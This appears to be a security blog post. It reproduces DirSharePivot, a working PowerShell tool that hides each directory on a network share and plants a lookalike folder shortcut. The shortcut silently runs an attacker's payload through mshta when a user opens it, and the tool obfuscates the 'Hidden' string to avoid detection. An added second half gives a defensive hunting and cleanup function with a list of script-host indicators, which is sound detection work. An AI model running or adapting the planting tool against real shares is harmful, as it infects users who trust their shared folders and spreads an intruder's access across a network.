Abusing network shares for lateral movement
https://rewtin.blogspot.jp/2017/11/abusing-user-shares-for-efficient.html
function DirSharePivot
{
<#
.SYNOPSIS
Function: DirSharePivot
Author: David ROUTIN - 13 nov 2017
Example:
DirSharePivot -StartDir K:\test -Payload "powershell -enc XXXXXXXXXXXXXXXXXXXXXXXX"
This sets every directory directly under the given path to Hidden (non-recursive, to keep control), then creates a LNK file
carrying your payload with the name of each hidden directory.
The LNK uses the folder icon from shell32.dll, so on a share viewed with Explorer's default "hide hidden items" setting it looks
like the original folder. Clicking it opens Explorer on the hidden directory, so the user sees what they expected, and runs
your payload through mshta.exe.
Caveats: StartDir and the payload are embedded in a VBScript string run by mshta, so neither may contain a double quote, and a
StartDir containing spaces must be quoted inside the Arguments line. You need write access to the share; existing files are
not modified.
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$StartDir,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$Payload
)
# -Force also returns directories that are already hidden; -Directory skips files.
$Filepath = Get-ChildItem -Path $StartDir -Force -Directory
# One COM object serves every shortcut; no need to create it per iteration.
$Shell = New-Object -ComObject ("WScript.Shell")
foreach ( $Object in $Filepath ) {
# The index trick spells "Hidden" without the literal string. OR it in so ReadOnly/System bits already set are preserved.
$Object.Attributes = $Object.Attributes -bor [IO.FileAttributes](-join "uRtHoirdebn"[3,5,7,7,8,10])
# Use .Name explicitly: "$Object" is the bare name in Windows PowerShell but the full path in PowerShell 6+.
$Target = Join-Path -Path $StartDir -ChildPath $Object.Name
$ShortCut = $Shell.CreateShortcut($Target + ".lnk")
$ShortCut.TargetPath = "mshta.exe"
# mshta evaluates the vbscript: URI. Execute() runs the inner script, which starts a hidden cmd that opens Explorer on the
# real directory and then runs the payload; Close() terminates mshta once that is launched.
$ShortCut.Arguments = 'vbscript:Close(Execute("Set x = CreateObject(""WScript.shell""): x.Run ""cmd /c explorer.exe ' + $Target + " & " + $Payload + '"",vbhide "))'
$ShortCut.WindowStyle = 1
$ShortCut.Hotkey = "CTRL+SHIFT+F"
# Icon index 3 in shell32.dll is the standard folder icon.
$ShortCut.IconLocation = "C:\windows\System32\shell32.dll, 3"
$ShortCut.Description = $Object.Name
$ShortCut.Save()
}
}
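The defensive counterpart, as an added example that is not part of the original post or of David Routin's tooling: a hunting function that scans a share for the exact artefact DirSharePivot leaves behind, a hidden directory with a sibling .lnk of the same name whose target is a script host instead of the folder. It reads each shortcut through the same WScript.Shell COM object, which loads an existing .lnk when CreateShortcut is pointed at it. The function name, the indicator list in $LolBins and the -Remediate behaviour are my own assumptions, not anything the page defines.

```powershell
function Find-DirSharePivotLnk
{
<#
.SYNOPSIS
Hunts a folder or share for the DirSharePivot pattern: a hidden directory next to
a .lnk of the same name that launches a script host rather than opening the folder.
.EXAMPLE
Find-DirSharePivotLnk -Path \\fileserver\users -Recurse
Find-DirSharePivotLnk -Path K:\test -Remediate
#>
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String] $Path,
[Switch] $Recurse,
[Switch] $Remediate
)
$Shell = New-Object -ComObject WScript.Shell
# Hosts a "folder" shortcut has no business launching (assumed indicator list, extend as needed).
$LolBins = 'mshta|powershell|pwsh|\bcmd\b|wscript|cscript|rundll32|regsvr32|certutil|bitsadmin'

# -Force is required or hidden directories are never enumerated.
$Dirs = Get-ChildItem -Path $Path -Force -Directory -Recurse:$Recurse -ErrorAction SilentlyContinue |
Where-Object { $_.Attributes.HasFlag([IO.FileAttributes]::Hidden) }

foreach ($Dir in $Dirs) {
$LnkPath = Join-Path -Path $Dir.Parent.FullName -ChildPath ($Dir.Name + '.lnk')
if (-not (Test-Path -LiteralPath $LnkPath)) { continue }

# CreateShortcut on an existing .lnk loads it instead of creating a new one.
$Lnk = $Shell.CreateShortcut($LnkPath)
$CommandLine = $Lnk.TargetPath + ' ' + $Lnk.Arguments
$Suspicious = [bool]($CommandLine -imatch $LolBins)
# shell32.dll icon 3 is the folder icon; a real folder shortcut would point at explorer or the folder itself.
$FolderIcon = [bool]($Lnk.IconLocation -imatch 'shell32\.dll,\s*3$')

$Remediated = $false
if ($Remediate -and $Suspicious) {
Remove-Item -LiteralPath $LnkPath -Force
# Hidden is known to be set here, so XOR clears only that bit.
$Dir.Attributes = $Dir.Attributes -bxor [IO.FileAttributes]::Hidden
$Remediated = $true
}

[PSCustomObject]@{
HiddenDir  = $Dir.FullName
Lnk        = $LnkPath
LnkWritten = (Get-Item -LiteralPath $LnkPath -Force -ErrorAction SilentlyContinue).LastWriteTime
Target     = $Lnk.TargetPath
Arguments  = $Lnk.Arguments
FolderIcon = $FolderIcon
Suspicious = $Suspicious
Remediated = $Remediated
}
}
}
```

Run it without -Remediate first and review the Arguments column: the payload is visible in clear in the shortcut, which makes the .lnk itself the evidence worth preserving before cleanup. LnkWritten gives the approximate time of the planting, which is what you pivot on in share access logs.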